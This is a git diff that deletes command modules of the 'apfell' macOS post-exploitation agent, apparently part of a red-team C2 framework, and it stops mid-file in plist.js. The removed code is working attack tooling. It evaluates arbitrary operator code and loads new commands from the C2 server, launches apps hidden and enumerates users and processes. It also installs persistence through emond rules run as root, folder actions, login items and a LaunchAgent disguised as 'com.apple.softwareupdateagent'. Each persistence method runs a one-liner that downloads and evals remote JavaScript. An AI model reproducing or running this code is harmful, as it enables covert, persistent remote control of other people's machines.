a/Payload_Types/apfell/agent_code/jscript.js b/Payload_Types/apfell/agent_code/jscript.js deleted file mode 100755 index ec16398ce..000000000 --- a/Payload_Types/apfell/agent_code/jscript.js +++ /dev/null @@ -1,25 +0,0 @@ -exports.jscript = function(task, command, params){ - //simply eval a javascript string and return the response - let response = ""; - try{ - let command_params = JSON.parse(params); - if(!command_params.hasOwnProperty("command")){ return {"user_output": "Missing command parameter", "status": "error", "completed": true};} - response = ObjC.deepUnwrap(eval(command_params['command'])); - } - catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } - if(response === undefined || response === ""){ - response = "No Command Output"; - } - if(response === true){ - response = "True"; - } - if(response === false){ - response = "False"; - } - if(typeof(response) != "string"){ - response = String(response); - } - return {"user_output":response, "completed": true}; -}; diff --git a/Payload_Types/apfell/agent_code/jsimport.js b/Payload_Types/apfell/agent_code/jsimport.js deleted file mode 100755 index 73289fdf4..000000000 --- a/Payload_Types/apfell/agent_code/jsimport.js +++ /dev/null @@ -1,21 +0,0 @@ -exports.jsimport = function(task,command,params){ - let script = ""; - try{ - let config = JSON.parse(params); - if(config.hasOwnProperty("file")){ - let script_data = C2.upload(task, config['file']); - if(typeof script_data === "string"){ - return{"user_output":"Failed to get contents of file", "completed": true, "status": "error"}; - } - script = ObjC.unwrap($.NSString.alloc.initWithDataEncoding(script_data, $.NSUTF8StringEncoding)); - } - else{ - return {"user_output":"Need to supply a valid file to download", "completed": true, "status": "error"}; - } - jsimport = script; - return {"user_output":"Imported the script", "completed": true}; - } - catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/jsimport_call.js b/Payload_Types/apfell/agent_code/jsimport_call.js deleted file mode 100755 index c7c6efe82..000000000 --- a/Payload_Types/apfell/agent_code/jsimport_call.js +++ /dev/null @@ -1,23 +0,0 @@ -exports.jsimport_call = function(task, command, params){ - try{ - let command_params = JSON.parse(params); - if(!command_params.hasOwnProperty('command')){ return {"user_output": "missing command parameter", "status": "error", "completed": true};} - let output = ObjC.deepUnwrap(eval(jsimport + "\n " + command_params['command'])); - if(output === "" || output === undefined){ - return {"user_output":"No command output", "completed": true}; - } - if(output === true){ - return {"user_output":"True", "completed": true}; - } - if(output === false){ - return{"user_output":"False", "completed": true}; - } - if(typeof(output) != "string"){ - output = String(output); - } - return {"user_output":output, "completed": true}; - } - catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/launchapp.js b/Payload_Types/apfell/agent_code/launchapp.js deleted file mode 100755 index c83ce5729..000000000 --- a/Payload_Types/apfell/agent_code/launchapp.js +++ /dev/null @@ -1,20 +0,0 @@ -exports.launchapp = function(task, command, params){ - //this should be the bundle identifier like com.apple.itunes to launch - //it will launch hidden, asynchronously, and will be 'hidden' (still shows up in the dock though) - let response = ""; - try{ - let command_params = JSON.parse(params); - if(!command_params.hasOwnProperty('bundle')){ return {"user_output": "missing bundle identifier", "completed": true, "status": "error"}} - ObjC.import('AppKit'); - $.NSWorkspace.sharedWorkspace.launchAppWithBundleIdentifierOptionsAdditionalEventParamDescriptorLaunchIdentifier( - command_params['bundle'], - $.NSWorkspaceLaunchAsync | $.NSWorkspaceLaunchAndHide | $.NSWorkspaceLaunchWithoutAddingToRecents, - $.NSAppleEventDescriptor.nullDescriptor, - null - ); - return {"user_output":"Program launched", "completed": true}; - } - catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/list_apps.js b/Payload_Types/apfell/agent_code/list_apps.js deleted file mode 100755 index b4eef5a80..000000000 --- a/Payload_Types/apfell/agent_code/list_apps.js +++ /dev/null @@ -1,33 +0,0 @@ -exports.list_apps = function(task, command, params){ - ObjC.import('AppKit'); - try{ - let names = []; - let procs = $.NSWorkspace.sharedWorkspace.runningApplications.js; - for(let i = 0; i < procs.length; i++){ - let info = {}; - info['frontMost'] = procs[i].active; - info['hidden'] = procs[i].hidden; - info['bundle'] = procs[i].bundleIdentifier.js; - info['bundleURL'] = procs[i].bundleURL.path.js; - info['bin_path'] = procs[i].executableURL.path.js; - info['process_id'] = procs[i].processIdentifier; - info['name'] = procs[i].localizedName.js; - if(procs[i].executableArchitecture === "16777223"){ - info['architecture'] = "x64"; - } - else if(procs[i].executableArchitecture === "7"){ - info['architecture'] = "x86"; - } - else if(procs[i].executableArchitecture === "18"){ - info['architecture'] = "x86_PPC"; - } - else if(procs[i].executableArchitecture === "16777234"){ - info['architecture'] = "x86_64_PPC"; - } - names.push(info); - } - return {"user_output":JSON.stringify(names, null, 2), "completed": true}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/list_users.js b/Payload_Types/apfell/agent_code/list_users.js deleted file mode 100755 index 7ed611916..000000000 --- a/Payload_Types/apfell/agent_code/list_users.js +++ /dev/null @@ -1,99 +0,0 @@ -exports.list_users = function(task, command, params){ - let all_users = []; - let gid = -1; - let groups = false; - if(params.length > 0){ - let data = JSON.parse(params); - if(data.hasOwnProperty('gid') && data['gid'] !== "" && data['gid'] > 0){ - gid = data['gid']; - } - if(data.hasOwnProperty("groups") && data['groups'] !== ""){ - groups = data['groups']; - } - } - ObjC.import('Collaboration'); - ObjC.import('CoreServices'); - if(gid < 0){ - let defaultAuthority = $.CSGetLocalIdentityAuthority(); - let identityClass = 2; - if(groups){ - all_users = []; // we will want to do a dictionary so we can group the members by their GID - } - else{ - identityClass = 1; //enumerate users - } - let query = $.CSIdentityQueryCreate($(), identityClass, defaultAuthority); - let error = Ref(); - $.CSIdentityQueryExecute(query, 0, error); - let results = $.CSIdentityQueryCopyResults(query); - let numResults = parseInt($.CFArrayGetCount(results)); - if(results.js === undefined){ - results = $.CFMakeCollectable(results); - } - for(let i = 0; i < numResults; i++){ - let identity = results.objectAtIndex(i);//results[i]; - let idObj = $.CBIdentity.identityWithCSIdentity(identity); - if(groups){ - //if we're looking at groups, then we have a different info to print out - all_users[i] = {}; - all_users[i]["POSIXID"] = idObj.posixGID; - all_users[i]['aliases'] = ObjC.deepUnwrap(idObj.aliases); - all_users[i]['fullName'] = ObjC.deepUnwrap(idObj.fullName); - all_users[i]['POSIXName'] = ObjC.deepUnwrap(idObj.posixName); - all_users[i]['members'] = []; - let members = idObj.memberIdentities.js; - for(let j = 0; j < members.length; j++){ - let info = { - "POSIXName": members[j].posixName.js, - "POSIXID": members[j].posixUID, - "LocalAuthority": members[j].authority.localizedName.js, - "FullName": members[j].fullName.js, - "Emails": members[j].emailAddress.js, - "isHiddenAccount": members[j].isHidden, - "Enabled": members[j].isEnabled, - "Aliases": ObjC.deepUnwrap(members[j].aliases), - "UUID": members[j].UUIDString.js - }; - all_users[i]['members'].push(info); - } - } - else{ - let info = { - "POSIXName": idObj.posixName.js, - "POSIXID": idObj.posixUID, - "LocalAuthority": idObj.authority.localizedName.js, - "FullName": idObj.fullName.js, - "Emails": idObj.emailAddress.js, - "isHiddenAccount": idObj.isHidden, - "Enabled": idObj.isEnabled, - "Aliases": ObjC.deepUnwrap(idObj.aliases), - "UUID": idObj.UUIDString.js - }; - all_users.push(info); - } - } - } - else{ - let defaultAuthority = $.CBIdentityAuthority.defaultIdentityAuthority; - let group = $.CBGroupIdentity.groupIdentityWithPosixGIDAuthority(gid, defaultAuthority); - let results = group.memberIdentities.js; - let numResults = results.length; - for(let i = 0; i < numResults; i++){ - let idObj = results[i]; - let info = { - "POSIXName": idObj.posixName.js, - "POSIXID": idObj.posixUID, - "LocalAuthority": idObj.authority.localizedName.js, - "FullName": idObj.fullName.js, - "Emails": idObj.emailAddress.js, - "isHiddenAccount": idObj.isHidden, - "Enabled": idObj.isEnabled, - "Aliases": ObjC.deepUnwrap(idObj.aliases), - "UUID": idObj.UUIDString.js - }; - all_users.push(info); - } - } - return {"user_output":JSON.stringify(all_users, null, 2), "completed": true}; -}; - diff --git a/Payload_Types/apfell/agent_code/load.js b/Payload_Types/apfell/agent_code/load.js deleted file mode 100755 index 61e9b848b..000000000 --- a/Payload_Types/apfell/agent_code/load.js +++ /dev/null @@ -1,26 +0,0 @@ -exports.load = function(task, command, params){ - //base64 decode the params and pass it to the default_load command - // params should be {"cmds": "cmd1 cmd2 cmd3", "file_id": #} - try{ - let parsed_params = JSON.parse(params); - let code = C2.upload(task, parsed_params['file_id'], ""); - if(typeof code === "string"){ - return {"user_output":String(code), "completed": true, "status": "error"}; - //something failed, we should have NSData type back - } - let new_dict = default_load(base64_decode(code)); - commands_dict = Object.assign({}, commands_dict, new_dict); - // update the config with our new information - C2.commands = Object.keys(commands_dict); - let cmds = parsed_params['cmds'].split(" ") - let cmd_list = []; - for(let i = 0; i < cmds.length; i++){ - cmd_list.push({"action": "add", "cmd": cmds[i]}) - } - return {"user_output": "Loaded " + parsed_params['cmds'], "commands": cmd_list, "completed": true}; - } - catch(error){ - //console.log("errored in load function"); - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/ls.js b/Payload_Types/apfell/agent_code/ls.js deleted file mode 100755 index 4b1c6e9cf..000000000 --- a/Payload_Types/apfell/agent_code/ls.js +++ /dev/null @@ -1,123 +0,0 @@ -exports.ls = function(task, command, params){ - ObjC.import('Foundation'); - let output = {}; - try { - let command_params = JSON.parse(params); - let fileManager = $.NSFileManager.defaultManager; - let error = Ref(); - let path = command_params['path']; - if (path === "" || path === ".") { - path = fileManager.currentDirectoryPath.js; - if (path === undefined || path === "") { - return { - "user_output": "Failed to get current working directory", - "completed": true, - "status": "error" - }; - } - } - if (path[0] === '"') { - path = path.substring(1, path.length - 1); - } - if(path[0] === '~'){ - path = $(path).stringByExpandingTildeInPath.js; - } - output['host'] = ObjC.unwrap(apfell.procInfo.hostName); - let attributes = ObjC.deepUnwrap(fileManager.attributesOfItemAtPathError($(path), error)); - if (attributes !== undefined) { - output['is_file'] = true; - output['files'] = []; - if (attributes.hasOwnProperty('NSFileType') && attributes['NSFileType'] === "NSFileTypeDirectory") { - let error = Ref(); - output['is_file'] = false; - let files = ObjC.deepUnwrap(fileManager.contentsOfDirectoryAtPathError($(path), error)); - if (files !== undefined) { - let files_data = []; - output['success'] = true; - let sub_files = files; - if (path[path.length - 1] !== "/") { - path = path + "/"; - } - for (let i = 0; i < sub_files.length; i++) { - let attr = ObjC.deepUnwrap(fileManager.attributesOfItemAtPathError($(path + sub_files[i]), error)); - let file_add = {}; - file_add['name'] = sub_files[i]; - file_add['is_file'] = attr['NSFileType'] !== "NSFileTypeDirectory"; - let plistPerms = ObjC.unwrap(fileManager.attributesOfItemAtPathError($(path + sub_files[i]), $())); - if(plistPerms['NSFileExtendedAttributes'] !== undefined){ - let extended = {}; - let perms = plistPerms['NSFileExtendedAttributes'].js; - for(let j in perms){ - extended[j] = perms[j].base64EncodedStringWithOptions(0).js; - } - file_add['permissions'] = extended; - }else{ - file_add['permissions'] = {}; - } - file_add['size'] = attr['NSFileSize']; - let nsposix = attr['NSFilePosixPermissions']; - // we need to fix this mess to actually be real permission bits that make sense - file_add['permissions']['posix'] = ((nsposix >> 6) & 0x7).toString() + ((nsposix >> 3) & 0x7).toString() + (nsposix & 0x7).toString(); - file_add['permissions']['owner'] = attr['NSFileOwnerAccountName'] + "(" + attr['NSFileOwnerAccountID'] + ")"; - file_add['permissions']['group'] = attr['NSFileGroupOwnerAccountName'] + "(" + attr['NSFileGroupOwnerAccountID'] + ")"; - file_add['permissions']['hidden'] = attr['NSFileExtenionAttribute'] === true; - file_add['permissions']['create_time'] = attributes['NSFileCreationDate']; - file_add['modify_time'] = attributes['NSFileModificationDate']; - file_add['access_time'] = ""; - files_data.push(file_add); - } - output['files'] = files_data; - } - else{ - output['success'] = false; - } - } - let nsposix = attributes['NSFilePosixPermissions']; - let components = ObjC.deepUnwrap( fileManager.componentsToDisplayForPath(path) ).slice(1, -1); - if( components.length > 0 && components[0] === "Macintosh HD"){ - components.pop(); - } - output['parent_path'] = "/" + components.join("/"); - output['name'] = fileManager.displayNameAtPath(path).js; - if(output['name'] === "Macintosh HD"){output['name'] = "/";} - if(output['name'] === output['parent_path']){output['parent_path'] = "";} - output['size'] = attributes['NSFileSize']; - output['access_time'] = ""; - output['modify_time'] = attributes['NSFileModificationDate']; - if(attributes['NSFileExtendedAttributes'] !== undefined){ - let extended = {}; - let perms = attributes['NSFileExtendedAttributes'].js; - for(let j in perms){ - extended[j] = perms[j].base64EncodedStringWithOptions(0).js; - } - output['permissions'] = extended; - }else{ - output['permissions'] = {}; - } - output['permissions']['create_time'] = attributes['NSFileCreationDate']; - output['permissions']['posix'] =((nsposix >> 6) & 0x7).toString() + ((nsposix >> 3) & 0x7).toString() + (nsposix & 0x7).toString(); - output['permissions']['owner'] = attributes['NSFileOwnerAccountName'] + "(" + attributes['NSFileOwnerAccountID'] + ")"; - output['permissions']['group'] = attributes['NSFileGroupOwnerAccountName'] + "(" + attributes['NSFileGroupOwnerAccountID'] + ")"; - output['permissions']['hidden'] = attributes['NSFileExtensionHidden'] === true; - if(command_params['file_browser'] === "true"){ - return {"file_browser": output, "completed": true, "user_output": "added data to file browser"}; - }else{ - return {"file_browser": output, "completed": true, "user_output": JSON.stringify(output, null, 6)}; - } - } - else{ - return { - "user_output": "Failed to get attributes of file. File doesn't exist or you don't have permission to read it", - "completed": true, - "status": "error" - }; - } - - }catch(error){ - return { - "user_output": "Error: " + error.toString(), - "completed": true, - "status": "error" - }; - } -}; diff --git a/Payload_Types/apfell/agent_code/persist_emond.js b/Payload_Types/apfell/agent_code/persist_emond.js deleted file mode 100755 index b0ac4648d..000000000 --- a/Payload_Types/apfell/agent_code/persist_emond.js +++ /dev/null @@ -1,98 +0,0 @@ -exports.persist_emond = function(task, command, params){ - try{ - //emond persistence from https://www.xorrior.com/emond-persistence/ - let config = JSON.parse(params); - // read "/System/Library/LaunchDaemons/com.apple.emond.plist" for the "QueueDirectories" key (returns array) - // create ".DS_Store" file there that's empty - // create new plist in "/etc/emond.d/rules/" - let rule_name = "update_files"; - if(config.hasOwnProperty('rule_name') && config['rule_name'] !== ""){rule_name = config['rule_name'];} - let payload_type = "oneliner-jxa"; - if(config.hasOwnProperty('payload_type') && config['payload_type'] !== ""){payload_type = config['payload_type'];} - if(payload_type === "oneliner-jxa"){ - if(config.hasOwnProperty('url') && config['url'] !== ""){var url = config['url'];} - else{ return "URL is required for the oneliner-jxa payload_type"; } - var command = "eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString('" + - url + "')),$.NSUTF8StringEncoding)))"; - // now we need to base64 encode our command - var command_data = $(command).dataUsingEncoding($.NSData.NSUTF16StringEncoding); - var base64_command = command_data.base64EncodedStringWithOptions(0).js; - var full_command = "echo \"" + base64_command + "\" | base64 -D | /usr/bin/osascript -l JavaScript &"; - } - else if(payload_type === "custom_bash-c"){ - if(config.hasOwnProperty('command') && config['command'] !== ""){var full_command = config['command'];} - else{ - return {"user_output":"command is a required field for the custom_bash-c payload_type", "completed": true, "status": "error"}; - } - } - // get our new plist file_name - if(config.hasOwnProperty('file_name') && config['file_name'] !== ""){ var file_name = config['file_name'];} - else{ return {"user_output":"file name is required", "completed": true, "status": "error"}; } - - var plist_contents = "\n" + - "\n" + - "\n" + - "\n" + - " \n" + - " name\n" + - " " + rule_name + "\n" + - " enabled\n" + - " \n" + - " eventTypes\n" + - " \n" + - " startup\n" + - " \n" + - " actions\n" + - " \n" + - " \n" + - " command\n" + - " /bin/sleep\n" + - " user\n" + - " root\n" + - " arguments\n" + - " \n" + - " 60\n" + - " \n" + - " type\n" + - " RunCommand\n" + - " \n" + - " \n" + - " command\n" + - " /bin/bash\n" + - " user\n" + - " root\n" + - " arguments\n" + - " \n" + - " -c\n" + - " " + full_command + "\n" + - " \n" + - " type\n" + - " RunCommand\n" + - " \n" + - " \n" + - " \n" + - "\n" + - ""; - // read the plist file and check the QueueDirectories field - var prefs = ObjC.deepUnwrap($.NSMutableDictionary.alloc.initWithContentsOfFile($("/System/Library/LaunchDaemons/com.apple.emond.plist"))); - //console.log(JSON.stringify(prefs)); - var queueDirectories = prefs['QueueDirectories']; - if(queueDirectories !== undefined && queueDirectories.length > 0){ - var queueDirectoryPath = queueDirectories[0]; - write_data_to_file(" ", queueDirectoryPath + "/.DS_Store"); - // now that we have a file in our queueDirectory, we need to write out our plist - write_data_to_file(plist_contents, "/etc/emond.d/rules/" + file_name); - - var user_output = "Created " + queueDirectoryPath + "/.DS_Store and /etc/emond.d/rules/" + file_name + " with contents: \n" + plist_contents; - - // announce our created artifacts and user output - let artifacts = {'user_output': user_output, 'artifacts': [{'base_artifact': 'File Create', 'artifact': queueDirectoryPath + "/.DS_Store"}, {'base_artifact': 'File Create', 'artifact': '/etc/emond.d/rules/' + file_name}], "completed": true}; - return artifacts - } - else{ - return {"user_output":"QueueDirectories array is either not there or 0 in length", "completed": true, "status": "error"}; - } - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/persist_folderaction.js b/Payload_Types/apfell/agent_code/persist_folderaction.js deleted file mode 100755 index 9de77dbc2..000000000 --- a/Payload_Types/apfell/agent_code/persist_folderaction.js +++ /dev/null @@ -1,67 +0,0 @@ -exports.persist_folderaction = function(task, command, params){ - try{ - // ======= Get params ======== - let json_params = JSON.parse(params); - let folder = json_params['folder']; - let script_path = json_params['script_path']; - let url = json_params['url']; - let code = json_params['code']; - let lang = json_params['language']; - let code1 = "var app = Application.currentApplication();\n" + - "app.includeStandardAdditions = true;\n" + - "app.doShellScript(\" osascript -l JavaScript -e \\\"eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString('"; - let code2 = "')),$.NSUTF8StringEncoding)));\\\" &> /dev/null &\");"; - let output = ""; - // ======== Compile and write script to file ========== - ObjC.import('OSAKit'); - let mylang = ""; - let myscript = ""; - if(code !== ""){ - mylang = $.OSALanguage.languageForName(lang); - myscript = $.OSAScript.alloc.initWithSourceLanguage($(code),mylang); - }else{ - mylang = $.OSALanguage.languageForName("JavaScript"); - myscript = $.OSAScript.alloc.initWithSourceLanguage($(code1 + url + code2),mylang); - } - - myscript.compileAndReturnError($()); - let data = myscript.compiledDataForTypeUsingStorageOptionsError("osas", 0x00000003, $()); - data.writeToFileAtomically(script_path, true); - // ======= Handle the folder action persistence ======= - let se = Application("System Events"); - se.folderActionsEnabled = true; - let fa_exists = false; - let script_exists = false; - let myScript = se.Script({name: script_path.split("/").pop(), posixPath: script_path}); - let fa = se.FolderAction({name: folder.split("/").pop(), path: folder}); - // first check to see if there's a folder action for the path we're looking at - for(let i = 0; i < se.folderActions.length; i++){ - if(se.folderActions[i].path() === folder){ - // if our folder already has folder actions, just take the reference for later - fa = se.folderActions[i]; - fa_exists = true; - output += "Folder already has folder actions\n"; - break; - } - } - // if the folder action doesn't exist, add it - if(fa_exists === false){ - se.folderActions.push(fa); - } - // Check to see if this script already exists on this folder - for(let i = 0; i < fa.scripts.length; i++){ - if(fa.scripts[i].posixPath() === script_path){ - script_exists = true; - output += "Script already assigned to this folder\n"; - break; - } - } - if(script_exists === false){ - fa.scripts.push(myScript); - } - output += "Folder Action established"; - return {"user_output":output, "completed": true, "artifacts": [{"base_artifact":"File Create", "artifact": script_path}]}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/persist_launch.js b/Payload_Types/apfell/agent_code/persist_launch.js deleted file mode 100755 index 7a0df5dfe..000000000 --- a/Payload_Types/apfell/agent_code/persist_launch.js +++ /dev/null @@ -1,60 +0,0 @@ -exports.persist_launch = function(task, command, params){ - try{ - let config = JSON.parse(params); - let template = "\n" + - "\n" + - "\n" + - "\n" + - "Label\n"; - let label = "com.apple.softwareupdateagent"; - if(config.hasOwnProperty('label') && config['label'] !== ""){label = config['label'];} - template += "" + label + "\n"; - template += "ProgramArguments\n"; - if(config.hasOwnProperty('args') && config['args'].length > 0){ - if(config['args'][0] === "apfell-jxa"){ - // we'll add in an apfell-jxa one liner to run - template += "/usr/bin/osascript\n" + - "-l\n" + - "JavaScript\n" + - "-e\n" + - "eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString('" + - config['args'][1] + "')),$.NSUTF8StringEncoding)))\n" - } - else{ - for(let i = 0; i < config['args'].length; i++){ - template += "" + config['args'][i] + "\n"; - } - } - } - else{ - return {"user_output": "Program args needs values for \"apfell-jxa\"", "completed": true, "status": "error"}; - } - template += "\n"; - if(config.hasOwnProperty('KeepAlive') && config['KeepAlive'] === true){ template += "KeepAlive\n\n"; } - if(config.hasOwnProperty('RunAtLoad') && config['RunAtLoad'] === true){ template += "RunAtLoad\n\n"; } - template += "\n\n" - // now we need to actually write out the plist to disk - let response = ""; - if(config.hasOwnProperty('LocalAgent') && config['LocalAgent'] === true){ - let path = "~/Library/LaunchAgents/"; - path = $(path).stringByExpandingTildeInPath; - var fileManager = $.NSFileManager.defaultManager; - if(!fileManager.fileExistsAtPath(path)){ - $.fileManager.createDirectoryAtPathWithIntermediateDirectoriesAttributesError(path, false, $(), $()); - } - path = $(path.js + "/" + label + ".plist"); - response = write_data_to_file(template, path) + " to " + ObjC.deepUnwrap(path); - let artifacts = {'user_output': response, 'artifacts': [{'base_artifact': 'File Create', 'artifact': ObjC.deepUnwrap(path)}], "completed": true}; - return artifacts - } - else if(config.hasOwnProperty('LaunchPath') && config['LaunchPath'] !== ""){ - response = write_data_to_file(template, $(config['LaunchPath'])) + " to " + config["LaunchPath"]; - let artifacts = {'user_output': response, 'artifacts': [{'base_artifact': 'File Create', 'artifact': config["LaunchPath"]}], "completed": true}; - return artifacts - } - return artifacts - - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/persist_loginitem_allusers.js b/Payload_Types/apfell/agent_code/persist_loginitem_allusers.js deleted file mode 100644 index 34cc8f58c..000000000 --- a/Payload_Types/apfell/agent_code/persist_loginitem_allusers.js +++ /dev/null @@ -1,22 +0,0 @@ -exports.persist_loginitem_allusers = function(task, command, params){ - ObjC.import('CoreServices'); - ObjC.import('Security'); - ObjC.import('SystemConfiguration'); - let args = JSON.parse(params); - // Obtain authorization for the global login item list - // Set the item as hidden: https://github.com/pkamb/OpenAtLogin/blob/master/OpenAtLogin.m#L35 - let auth; - let result = $.AuthorizationCreate($.nil, $.nil, $.kAuthorizationDefaults, Ref(auth)); - - if (result === 0) { - let temp = $.CFURLCreateFromFileSystemRepresentation($.kCFAllocatorDefault, args['path'], args['path'].length, false); - let items = $.LSSharedFileListCreate($.kCFAllocatorDefault, $.kLSSharedFileListGlobalLoginItems, $.nil); - $.LSSharedFileListSetAuthorization(items, auth); - let cfName = $.CFStringCreateWithCString($.nil, args['name'], $.kCFStringEncodingASCII); - let itemRef = $.LSSharedFileListInsertItemURL(items, $.kLSSharedFileListItemLast, cfName, $.nil, temp, $.nil, $.nil); - return {"user_output": "LoginItem installation successful", "completed": true}; - } else { - return {"user_output": `LoginItem installation failed: AuthorizationCreate returned ${result}`, "completed": true}; - } - -}; \ No newline at end of file diff --git a/Payload_Types/apfell/agent_code/plist.js b/Payload_Types/apfell/agent_code/plist.js deleted file mode 100755 index 0c989fab8..000000000 --- a/Payload_Types/apfell/agent_code/plist.js +++ /dev/null @@ -1,203 +0,0 @@ -exports.plist = function(task, command, params){ - try{ - let config = JSON.parse(params); - ObjC.import('Foundation'); - let output = []; - try{ - if(config['type'] === "read"){ - output = []; - let filename = $.NSString.alloc.initWithUTF8String(config['filename']); - let prefs = $.NSMutableDictionary.alloc.initWithContentsOfFile(filename); - let contents = ObjC.deepUnwrap(prefs); - let fileManager = $.NSFileManager.defaultManager; - let plistPerms = ObjC.unwrap(fileManager.attributesOfItemAtPathError($(config['filename']), $())); - let nsposix = {}; - let posix = ""; - if(plistPerms !== undefined){ - nsposix = plistPerms['NSFilePosixPermissions'].js; - posix = ((nsposix >> 6) & 0x7).toString() + ((nsposix >> 3) & 0x7).toString() + (nsposix & 0x7).toString(); - if(plistPerms['NSFileExtendedAttributes'] !== undefined){ - let extended = {}; - let perms = plistPerms['NSFileExtendedAttributes'].js; - for(let j in perms){ - extended[j] = perms[j].base64EncodedStringWithOptions(0).js; - } - contents['PlistPermissionsExtendedAttributes'] = extended; - } - } - // we need to fix this mess to actually be real permission bits that make sense - contents['PlistPermissions'] = posix; - output.push(contents); - } - else if(config['type'] === "readLaunchAgents"){ - output = {}; - let fileManager = $.NSFileManager.defaultManager; - let error = Ref(); - let path = fileManager.homeDirectoryForCurrentUser.fileSystemRepresentation + "/Library/LaunchAgents/"; - let files = fileManager.contentsOfDirectoryAtPathError($(path), error); - try{ - // no errors, so now iterate over the files - files = ObjC.deepUnwrap(files); - output["localLaunchAgents"] = {}; - for(let i in files){ - let prefs = $.NSMutableDictionary.alloc.initWithContentsOfFile(path + files[i]); - let contents = ObjC.deepUnwrap(prefs); - let plistPerms = ObjC.unwrap(fileManager.attributesOfItemAtPathError($(path + files[i]), $())); - let nsposix = {}; - let posix = ""; - if(plistPerms !== undefined){ - nsposix = plistPerms['NSFilePosixPermissions'].js; - posix = ((nsposix >> 6) & 0x7).toString() + ((nsposix >> 3) & 0x7).toString() + (nsposix & 0x7).toString(); - if(plistPerms['NSFileExtendedAttributes'] !== undefined){ - let extended = {}; - let perms = plistPerms['NSFileExtendedAttributes'].js; - for(let j in perms){ - extended[j] = perms[j].base64EncodedStringWithOptions(0).js; - } - contents['PlistPermissionsExtendedAttributes'] = extended; - } - } - // we need to fix this mess to actually be real permission bits that make sense - contents['PlistPermissions'] = posix; - output["localLaunchAgents"][files[i]] = {}; - output["localLaunchAgents"][files[i]]['contents'] = contents; - if(contents !== undefined && contents.hasOwnProperty("ProgramArguments")){ - //now try to get the attributes of the program this plist points to since it might have attribute issues for abuse - let attributes = ObjC.deepUnwrap(fileManager.attributesOfItemAtPathError($(contents['ProgramArguments'][0]), $())); - if(attributes !== undefined){ - let trimmed_attributes = {}; - trimmed_attributes['NSFileOwnerAccountID'] = attributes['NSFileOwnerAccountID']; - trimmed_attributes['NSFileExtensionHidden'] = attributes['NSFileExtensionHidden']; - trimmed_attributes['NSFileGroupOwnerAccountID'] = attributes['NSFileGroupOwnerAccountID']; - trimmed_attributes['NSFileOwnerAccountName'] = attributes['NSFileOwnerAccountName']; - trimmed_attributes['NSFileCreationDate'] = attributes['NSFileCreationDate']; - nsposix = attributes['NSFilePosixPermissions']; - // we need to fix this mess to actually be real permission bits that make sense - posix = ((nsposix >> 6) & 0x7).toString() + ((nsposix >> 3) & 0x7).toString() + (nsposix & 0x7).toString(); - trimmed_attributes['NSFilePosixPermissions'] = posix; - trimmed_attributes['NSFileGroupOwnerAccountName'] = attributes['NSFileGroupOwnerAccountName']; - trimmed_attributes['NSFileModificationDate'] = attributes['NSFileModificationDate']; - output["localLaunchAgents"][files[i]]['ProgramAttributes'] = trimmed_attributes; - } - } - } - }catch(error){ - return {"user_output":"Error trying to read ~/Library/LaunchAgents: " + error.toString(), "completed": true, "status": "error"}; - } - path = "/Library/LaunchAgents/"; - files = fileManager.contentsOfDirectoryAtPathError($(path), error); - try{ - // no errors, so now iterate over the files - files = ObjC.deepUnwrap(files); - output["systemLaunchAgents"] = {}; - for(let i in files){ - let prefs = $.NSMutableDictionary.alloc.initWithContentsOfFile(path + files[i]); - let contents = ObjC.deepUnwrap(prefs); - let plistPerms = ObjC.unwrap(fileManager.attributesOfItemAtPathError($(path + files[i]), $())); - let nsposix = {}; - let posix = ""; - if(plistPerms !== undefined){ - nsposix = plistPerms['NSFilePosixPermissions'].js; - posix = ((nsposix >> 6) & 0x7).toString() + ((nsposix >> 3) & 0x7).toString() + (nsposix & 0x7).toString(); - if(plistPerms['NSFileExtendedAttributes'] !== undefined){ - let extended = {}; - let perms = plistPerms['NSFileExtendedAttributes'].js; - for(let j in perms){ - extended[j] = perms[j].base64EncodedStringWithOptions(0).js; - } - contents['PlistPermissionsExtendedAttributes'] = extended; - } - } - // we need to fix this mess to actually be real permission bits that make sense - contents['PlistPermissions'] = posix; - output['systemLaunchAgents'][files[i]] = {}; - output["systemLaunchAgents"][files[i]]['contents'] = contents; - if(contents !== undefined && contents.hasOwnProperty("ProgramArguments")){ - let attributes = ObjC.deepUnwrap(fileManager.attributesOfItemAtPathError($(contents['ProgramArguments'][0]), $())); - if(attributes !== undefined){ - let trimmed_attributes = {}; - trimmed_attributes['NSFileOwnerAccountID'] = attributes['NSFileOwnerAccountID']; - trimmed_attributes['NSFileExtensionHidden'] = attributes['NSFileExtensionHidden']; - trimmed_attributes['NSFileGroupOwnerAccountID'] = attributes['NSFileGroupOwnerAccountID']; - trimmed_attributes['NSFileOwnerAccountName'] = attributes['NSFileOwnerAccountName']; - trimmed_attributes['NSFileCreationDate'] = attributes['NSFileCreationDate']; - let nsposix = attributes['NSFilePosixPermissions']; - // we need to fix this mess to actually be real permission bits that make sense - trimmed_attributes['NSFilePosixPermissions'] = ((nsposix >> 6) & 0x7).toString() + ((nsposix >> 3) & 0x7).toString() + (nsposix & 0x7).toString();; - trimmed_attributes['NSFileGroupOwnerAccountName'] = attributes['NSFileGroupOwnerAccountName']; - trimmed_attributes['NSFileModificationDate'] = attributes['NSFileModificationDate']; - output["systemLaunchAgents"][files[i]]['ProgramAttributes'] = trimmed_attributes; - } - } - } - } - catch(error){ - return {"user_output":"Error trying to read /Library/LaunchAgents: " + 